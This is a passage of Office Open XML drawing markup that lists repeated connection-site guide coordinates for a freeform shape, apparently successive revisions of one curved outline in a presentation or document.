              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1682429 h 2213558"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1619876 h 2213558"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1572780 h 2213558"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1513800 h 2213558"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1431681 h 2213558"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1367426 h 2213558"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1311496 h 2213558"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1247477 h 2213558"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1099433 h 2213558"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1099433 h 2213558"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 663988 h 2213558"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 586400 h 2213558"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 220935 h 2213558"/>
              <a:gd name="connsiteX24" fmla="*/ 8905671 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 184137 h 2213558"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 97899 h 2213558"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 11350 h 2213558"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 576061 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 210596 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8905671 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 173798 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 576061 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 210596 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127022 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 576061 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 155316 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127022 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 576061 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 155316 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127022 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 8018744 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 354943 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 155316 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127022 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 8018744 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 354943 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 155316 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127022 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203219 h 2203219"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179145 h 2203219"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2166048 h 2203219"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090987 h 2203219"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2051108 h 2203219"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041246 h 2203219"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994748 h 2203219"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943960 h 2203219"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793917 h 2203219"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672090 h 2203219"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609537 h 2203219"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562441 h 2203219"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503461 h 2203219"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421342 h 2203219"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357087 h 2203219"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301157 h 2203219"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237138 h 2203219"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089094 h 2203219"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653649 h 2203219"/>
              <a:gd name="connsiteX22" fmla="*/ 8203042 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 354943 h 2203219"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 155316 h 2203219"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127022 h 2203219"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 87560 h 2203219"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1011 h 2203219"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1799 h 2204007"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2204007 h 2204007"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2204007 h 2204007"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2179933 h 2204007"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
